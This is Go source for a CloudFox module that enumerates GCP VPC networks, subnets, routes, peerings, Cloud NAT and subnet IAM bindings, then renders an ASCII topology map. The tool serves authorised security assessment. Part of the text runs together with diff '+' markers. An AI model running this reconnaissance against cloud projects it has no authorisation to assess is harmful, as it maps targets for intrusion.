		ProjectNetworks: make(map[string][]VPCNetwork),
		ProjectSubnets:  make(map[string][]Subnet),
		ProjectPeerings: make(map[string][]VPCPeering),
		ProjectNATs:     make(map[string][]CloudNATConfig),
		ProjectRoutes:   make(map[string][]NetworkRoute),
		SharedVPCs:      make(map[string]*SharedVPCConfig),
		LootMap:         make(map[string]map[string]*internal.LootFile),
	}

	// Execute enumeration
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}

// ------------------------------
// Module Execution
+// ------------------------------ +func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Compute client + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, logger) + }(projectID) + } + wg.Wait() + + // Check results + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { + logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", + len(allNetworks), len(allSubnets), len(allPeerings), len(allNATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *NetworkTopologyModule) getAllNetworks() []VPCNetwork { + var all []VPCNetwork + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *NetworkTopologyModule) getAllSubnets() []Subnet { + var all []Subnet + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *NetworkTopologyModule) getAllPeerings() []VPCPeering { + var all []VPCPeering + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *NetworkTopologyModule) getAllNATs() []CloudNATConfig { + var all []CloudNATConfig + for _, nats := range m.ProjectNATs { + all = append(all, nats...) + } + return all +} + +func (m *NetworkTopologyModule) getAllRoutes() []NetworkRoute { + var all []NetworkRoute + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) 
	}
	return all
}

// ------------------------------
// Project Processor
// ------------------------------

// processProject runs the four per-project enumerations in sequence and
// seeds the project's loot file. Called from one goroutine per project.
func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME)
	}

	m.mu.Lock()
	// Initialize loot for this project exactly once.
	if m.LootMap[projectID] == nil {
		m.LootMap[projectID] = make(map[string]*internal.LootFile)
		m.LootMap[projectID]["network-topology-commands"] = &internal.LootFile{
			Name:     "network-topology-commands",
			Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: vpcnetworks-commands for quick enumeration and cross-project peering\n\n",
		}
	}
	m.mu.Unlock()

	// List networks (also detects Shared VPC host status).
	m.enumerateNetworks(ctx, projectID, computeService, logger)

	// List subnets
	m.enumerateSubnets(ctx, projectID, computeService, logger)

	// List routes
	m.enumerateRoutes(ctx, projectID, computeService, logger)

	// List Cloud NAT
	m.enumerateCloudNAT(ctx, projectID, computeService, logger)
}

// enumerateNetworks pages through all VPC networks of a project, recording
// each network and every peering declared on it.
func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	req := computeService.Networks.List(projectID)
	err := req.Pages(ctx, func(page *compute.NetworkList) error {
		for _, network := range page.Items {
			vpc := VPCNetwork{
				Name:        network.Name,
				ProjectID:   projectID,
				SelfLink:    network.SelfLink,
				Description: network.Description,
				// RoutingConfig may be nil; default to "" in that case.
				RoutingMode: func() string {
					if network.RoutingConfig != nil {
						return network.RoutingConfig.RoutingMode
					}
					return ""
				}(),
				AutoCreateSubnets: network.AutoCreateSubnetworks,
				MTU:               network.Mtu,
				CreationTimestamp: network.CreationTimestamp,
				SubnetCount:       len(network.Subnetworks),
			}

			// Check for peerings declared on this network.
			for _, peering := range network.Peerings {
				vpc.PeeringCount++

				peeringRecord := VPCPeering{
					Name:              peering.Name,
					Network:           network.SelfLink,
					PeerNetwork:       peering.Network,
					State:             peering.State,
					StateDetails:      peering.StateDetails,
					ExportCustomRoute: peering.ExportCustomRoutes,
					ImportCustomRoute: peering.ImportCustomRoutes,
					ExportSubnetRoute: peering.ExportSubnetRoutesWithPublicIp,
					ImportSubnetRoute: peering.ImportSubnetRoutesWithPublicIp,
					ProjectID:         projectID,
					AutoCreateRoutes:  peering.AutoCreateRoutes,
				}

				// Extract peer project ID from the peer network URL.
				peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network)

				m.mu.Lock()
				m.ProjectPeerings[projectID] = append(m.ProjectPeerings[projectID], peeringRecord)
				m.mu.Unlock()
			}

			m.mu.Lock()
			m.ProjectNetworks[projectID] = append(m.ProjectNetworks[projectID], vpc)
			m.mu.Unlock()
		}
		return nil
	})

	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
			fmt.Sprintf("Could not list networks in project %s", projectID))
	}

	// Check for Shared VPC host project (marks networks after enumeration).
	m.checkSharedVPCHost(ctx, projectID, computeService, logger)
}

// enumerateSubnets pages through the aggregated (all-region) subnet list,
// recording CIDRs, secondary ranges, flow-log/PGA flags, and IAM bindings.
func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	req := computeService.Subnetworks.AggregatedList(projectID)
	err := req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error {
		for region, subnetList := range page.Items {
			if subnetList.Subnetworks == nil {
				continue
			}
			// Aggregated-list keys look like "regions/us-central1".
			regionName := m.extractRegionFromURL(region)
			for _, subnet := range subnetList.Subnetworks {
				subnetRecord := Subnet{
					Name:                  subnet.Name,
					ProjectID:             projectID,
					Network:               subnet.Network,
					Region:                regionName,
					IPCIDRRange:           subnet.IpCidrRange,
					PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess,
					Purpose:               subnet.Purpose,
					Role:                  subnet.Role,
					StackType:             subnet.StackType,
				}

				// Check for flow logs
				if subnet.LogConfig != nil {
					subnetRecord.FlowLogsEnabled = subnet.LogConfig.Enable
				}

				// Secondary ranges, recorded as "name:cidr".
				for _, sr := range subnet.SecondaryIpRanges {
					subnetRecord.SecondaryRanges = append(subnetRecord.SecondaryRanges,
						fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange))
				}

				// Get IAM bindings for the subnet (best-effort; one extra API
				// call per subnet).
				subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name)

				m.mu.Lock()
				m.ProjectSubnets[projectID] = append(m.ProjectSubnets[projectID], subnetRecord)
				m.mu.Unlock()
			}
		}
		return nil
	})

	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
			fmt.Sprintf("Could not list subnets in project %s", projectID))
	}
}

// getSubnetIAMBindings retrieves IAM bindings for a subnet. Errors are
// swallowed deliberately (returns nil) — bindings are opportunistic extra
// data and missing permissions are common.
func (m *NetworkTopologyModule) getSubnetIAMBindings(ctx context.Context, computeService *compute.Service, projectID, region, subnetName string) []SubnetIAMBinding {
	policy, err := computeService.Subnetworks.GetIamPolicy(projectID, region, subnetName).Context(ctx).Do()
	if err != nil {
		return nil
	}

	var bindings []SubnetIAMBinding
	for _, binding := range policy.Bindings {
		if binding == nil {
			continue
		}
		// Flatten each (role, [members...]) binding into (role, member) pairs.
		for _, member := range binding.Members {
			bindings = append(bindings, SubnetIAMBinding{
				Role:   binding.Role,
				Member: member,
			})
		}
	}
	return bindings
}

// enumerateRoutes pages through all routes of a project and classifies each
// route's next hop.
func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	req := computeService.Routes.List(projectID)
	err := req.Pages(ctx, func(page *compute.RouteList) error {
		for _, route := range page.Items {
			routeRecord := NetworkRoute{
				Name:      route.Name,
				ProjectID: projectID,
				Network:   route.Network,
				DestRange: route.DestRange,
				Priority:  route.Priority,
				Tags:      route.Tags,
			}

			// Determine next hop type: exactly one NextHop* field is set per
			// route in the compute API.
			switch {
case route.NextHopGateway != "": + routeRecord.NextHopType = "gateway" + routeRecord.NextHop = route.NextHopGateway + case route.NextHopInstance != "": + routeRecord.NextHopType = "instance" + routeRecord.NextHop = route.NextHopInstance + case route.NextHopIp != "": + routeRecord.NextHopType = "ip" + routeRecord.NextHop = route.NextHopIp + case route.NextHopNetwork != "": + routeRecord.NextHopType = "network" + routeRecord.NextHop = route.NextHopNetwork + case route.NextHopPeering != "": + routeRecord.NextHopType = "peering" + routeRecord.NextHop = route.NextHopPeering + case route.NextHopIlb != "": + routeRecord.NextHopType = "ilb" + routeRecord.NextHop = route.NextHopIlb + case route.NextHopVpnTunnel != "": + routeRecord.NextHopType = "vpn" + routeRecord.NextHop = route.NextHopVpnTunnel + } + + m.mu.Lock() + m.ProjectRoutes[projectID] = append(m.ProjectRoutes[projectID], routeRecord) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // List routers to find NAT configurations + req := computeService.Routers.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, routerList := range page.Items { + if routerList.Routers == nil { + continue + } + for _, router := range routerList.Routers { + for _, nat := range router.Nats { + natRecord := CloudNATConfig{ + Name: nat.Name, + ProjectID: projectID, + Region: m.extractRegionFromURL(region), + Network: router.Network, + MinPortsPerVM: nat.MinPortsPerVm, + SourceSubnetworkType: nat.SourceSubnetworkIpRangesToNat, + } + + // NAT IP addresses + for _, natIP := range nat.NatIps { + natRecord.NATIPAddresses = append(natRecord.NATIPAddresses, 
natIP) + } + + // Subnets using this NAT + for _, subnet := range nat.Subnetworks { + natRecord.Subnets = append(natRecord.Subnets, subnet.Name) + } + + // Logging + if nat.LogConfig != nil { + natRecord.EnableLogging = nat.LogConfig.Enable + } + + m.mu.Lock() + m.ProjectNATs[projectID] = append(m.ProjectNATs[projectID], natRecord) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list Cloud NAT in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Check if project is a Shared VPC host + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return + } + + if project.XpnProjectStatus == "HOST" { + m.mu.Lock() + m.SharedVPCs[projectID] = &SharedVPCConfig{ + HostProject: projectID, + ServiceProjects: []string{}, + SharedSubnets: []string{}, + SharedNetworks: []string{}, + } + m.mu.Unlock() + + // List service projects + xpnReq := computeService.Projects.GetXpnResources(projectID) + err := xpnReq.Pages(ctx, func(page *compute.ProjectsGetXpnResources) error { + for _, resource := range page.Resources { + if resource.Type == "PROJECT" { + m.mu.Lock() + m.SharedVPCs[projectID].ServiceProjects = append( + m.SharedVPCs[projectID].ServiceProjects, resource.Id) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list XPN resources in project %s", projectID)) + } + + // Mark host networks + m.mu.Lock() + if networks, ok := m.ProjectNetworks[projectID]; ok { + for i := range networks { + networks[i].IsSharedVPC = true + networks[i].SharedVPCRole = "host" + } + m.ProjectNetworks[projectID] = networks + } + m.mu.Unlock() + } +} + + +// 
------------------------------ +// Helper Functions +// ------------------------------ +func (m *NetworkTopologyModule) extractProjectFromURL(url string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + if strings.Contains(url, "projects/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *NetworkTopologyModule) extractNetworkName(url string) string { + // Extract network name from full URL + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { + // Extract region from URL like regions/us-central1 + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +// ------------------------------ +// ASCII Network Diagram Generator +// ------------------------------ + +// generateASCIIDiagram creates an ASCII visualization of the network topology +func (m *NetworkTopologyModule) generateASCIIDiagram() string { + var sb strings.Builder + + // Header + sb.WriteString(m.drawBox("GCP NETWORK TOPOLOGY MAP - Generated by CloudFox", 90)) + sb.WriteString("\n") + + // Get all data + allNetworks := m.getAllNetworks() + allPeerings := m.getAllPeerings() + + // Group networks by project + networksByProject := make(map[string][]VPCNetwork) + for _, n := range allNetworks { + networksByProject[n.ProjectID] = append(networksByProject[n.ProjectID], n) + } + + // Group subnets by project and network + subnetsByNetwork := make(map[string][]Subnet) // key: "projectID/networkName" + for _, subnets := range m.ProjectSubnets { + for _, s := range subnets { + networkName := m.extractNetworkName(s.Network) + key := s.ProjectID + "/" + networkName + 
subnetsByNetwork[key] = append(subnetsByNetwork[key], s) + } + } + + // Group NATs by project and network + natsByNetwork := make(map[string][]CloudNATConfig) // key: "projectID/networkName" + for _, nats := range m.ProjectNATs { + for _, nat := range nats { + networkName := m.extractNetworkName(nat.Network) + key := nat.ProjectID + "/" + networkName + natsByNetwork[key] = append(natsByNetwork[key], nat) + } + } + + // Build peering map for quick lookup + peeringMap := make(map[string][]VPCPeering) // key: "projectID/networkName" + for _, p := range allPeerings { + networkName := m.extractNetworkName(p.Network) + key := p.ProjectID + "/" + networkName + peeringMap[key] = append(peeringMap[key], p) + } + + // Sort projects for consistent output + var projectIDs []string + for projectID := range networksByProject { + projectIDs = append(projectIDs, projectID) + } + sort.Strings(projectIDs) + + // Draw each project + for _, projectID := range projectIDs { + networks := networksByProject[projectID] + sb.WriteString(m.drawProjectSection(projectID, networks, subnetsByNetwork, natsByNetwork, peeringMap)) + sb.WriteString("\n") + } + + // Draw Shared VPC relationships if any + if len(m.SharedVPCs) > 0 { + sb.WriteString(m.drawSharedVPCSection()) + sb.WriteString("\n") + } + + // Draw VPC Peering summary + if len(allPeerings) > 0 { + sb.WriteString(m.drawPeeringSummary(allPeerings)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(m.drawLegend()) + + return sb.String() +} + +// drawBox draws a simple box with centered title +func (m *NetworkTopologyModule) drawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", 
width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawProjectSection draws the network topology for a single project +func (m *NetworkTopologyModule) drawProjectSection(projectID string, networks []VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering) string { + + var sb strings.Builder + width := 90 + + projectName := m.GetProjectName(projectID) + projectTitle := fmt.Sprintf("PROJECT: %s", projectID) + if projectName != "" && projectName != projectID { + projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, projectName) + } + + // Project header + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Sort networks + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + + // Draw each VPC network + for _, network := range networks { + sb.WriteString(m.drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width)) + } + + // Project footer + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawVPCNetwork draws a single VPC network with its subnets +func (m *NetworkTopologyModule) drawVPCNetwork(network VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering, outerWidth int) string { + + var sb strings.Builder + innerWidth := outerWidth - 6 + + // VPC header with attributes + vpcTitle := fmt.Sprintf("VPC: %s", network.Name) + vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU) + + // Add Shared VPC 
indicator + sharedVPCLabel := "" + if network.IsSharedVPC { + sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + + // Peering indicator + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount) + } + + sb.WriteString("│ │\n") + sb.WriteString("│ ┌") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┐ │\n") + + // VPC title line + titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel) + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine)) + + sb.WriteString("│ ├") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┤ │\n") + + // Get subnets for this network + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + // Group subnets by region + subnetsByRegion := make(map[string][]Subnet) + for _, s := range subnets { + subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s) + } + + // Sort regions + var regions []string + for region := range subnetsByRegion { + regions = append(regions, region) + } + sort.Strings(regions) + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)")) + } else { + // Draw subnets in a grid layout (3 per row) + subnetWidth := 26 + subnetsPerRow := 3 + + for i := 0; i < len(regions); i += subnetsPerRow { + // Draw subnet boxes for this row + endIdx := i + subnetsPerRow + if endIdx > len(regions) { + endIdx = len(regions) + } + rowRegions := regions[i:endIdx] + + // Top of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┐") + } + // Pad remaining space + remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - 
((len(rowRegions) - 1) * 2) + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Region name line + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionDisplay := region + if len(regionDisplay) > subnetWidth-4 { + regionDisplay = regionDisplay[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay)) + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Separator + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┤") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Subnet details for each region + maxSubnets := 0 + for _, region := range rowRegions { + if len(subnetsByRegion[region]) > maxSubnets { + maxSubnets = len(subnetsByRegion[region]) + } + } + + for subnetIdx := 0; subnetIdx < maxSubnets; subnetIdx++ { + // Subnet name + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + name := s.Name + if len(name) > subnetWidth-4 { + name = name[:subnetWidth-7] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // CIDR + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Flags (PGA, Logs) + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + pga := "PGA:N" + if s.PrivateIPGoogleAccess { + pga = "PGA:Y" + } + logs := "Logs:N" + if s.FlowLogsEnabled { + logs = "Logs:Y" + } + flags := fmt.Sprintf("[%s][%s]", pga, logs) + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + + // Bottom of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┘") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + } + + // Check for Cloud NAT + nats := natsByNetwork[key] + if len(nats) > 0 { + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ │ ┌────────────────────────┐ │ │\n") + for _, nat := range nats { + natIPs := "AUTO" + if len(nat.NATIPAddresses) > 0 { + natIPs = 
strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 18 { + natIPs = natIPs[:15] + "..." + } + } + sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", nat.Name[:min(11, len(nat.Name))])) + sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", nat.Region[:min(13, len(nat.Region))])) + sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs)) + } + sb.WriteString("│ │ └───────────┬────────────┘ │ │\n") + sb.WriteString("│ │ │ │ │\n") + sb.WriteString("│ │ ▼ │ │\n") + sb.WriteString("│ │ [INTERNET] │ │\n") + } + + // VPC footer + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ └") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┘ │\n") + + return sb.String() +} + +// drawSharedVPCSection draws Shared VPC host/service relationships +func (m *NetworkTopologyModule) drawSharedVPCSection() string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for hostProject, config := range m.SharedVPCs { + sb.WriteString("│ │\n") + sb.WriteString(fmt.Sprintf("│ ┌─────────────────────────────┐ │\n")) + sb.WriteString(fmt.Sprintf("│ │ HOST PROJECT │ │\n")) + + hostDisplay := hostProject + if len(hostDisplay) > 27 { + hostDisplay = hostDisplay[:24] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay)) + sb.WriteString(fmt.Sprintf("│ └──────────────┬──────────────┘ │\n")) + sb.WriteString(fmt.Sprintf("│ │ │\n")) + + if len(config.ServiceProjects) > 0 { + // Draw connection lines + numProjects := len(config.ServiceProjects) + if numProjects > 6 { + numProjects = 6 // Limit display + } + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + if i == 0 { + sb.WriteString("┌") + } else if i == numProjects-1 { + sb.WriteString("┬") + } else { + sb.WriteString("┬") + } + sb.WriteString("────────────") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString("┬────────────") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("▼ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("┌──────────┐ ")) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ... ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│%-10s│ ", proj)) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6)) + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("└──────────┘ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString(fmt.Sprintf("│ (Service Projects: %d total) │\n", len(config.ServiceProjects))) + } else { + sb.WriteString("│ │ │\n") + sb.WriteString("│ └── (No service projects found) │\n") + } + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawPeeringSummary draws a summary of all VPC peering relationships +func (m *NetworkTopologyModule) drawPeeringSummary(peerings []VPCPeering) string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + localNet := m.extractNetworkName(p.Network) + peerNet := m.extractNetworkName(p.PeerNetwork) + + // Truncate names if too long + if len(localNet) > 20 { + localNet = localNet[:17] + "..." + } + if len(peerNet) > 20 { + peerNet = peerNet[:17] + "..." 
		}

		// Filled dot for ACTIVE, hollow otherwise.
		stateIcon := "●"
		if p.State != "ACTIVE" {
			stateIcon = "○"
		}

		importRoutes := "N"
		if p.ImportCustomRoute {
			importRoutes = "Y"
		}
		exportRoutes := "N"
		if p.ExportCustomRoute {
			exportRoutes = "Y"
		}

		line := fmt.Sprintf("%s [%s] %s/%s ◄══════► %s/%s [Import:%s Export:%s]",
			stateIcon, p.State[:min(6, len(p.State))],
			p.ProjectID[:min(15, len(p.ProjectID))], localNet,
			p.PeerProjectID[:min(15, len(p.PeerProjectID))], peerNet,
			importRoutes, exportRoutes)

		// NOTE(review): byte slicing a string containing multi-byte runes
		// (●, ◄══════►) can split a UTF-8 sequence, and len() counts bytes,
		// so alignment/truncation of these lines is approximate.
		if len(line) > width-4 {
			line = line[:width-7] + "..."
		}

		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line))
	}

	sb.WriteString("│ │\n")
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// drawLegend draws the diagram legend explaining the symbols used above.
func (m *NetworkTopologyModule) drawLegend() string {
	var sb strings.Builder
	width := 90

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")
	sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "PGA = Private Google Access", "● = Active peering"))
	sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Logs = VPC Flow Logs enabled", "○ = Inactive peering"))
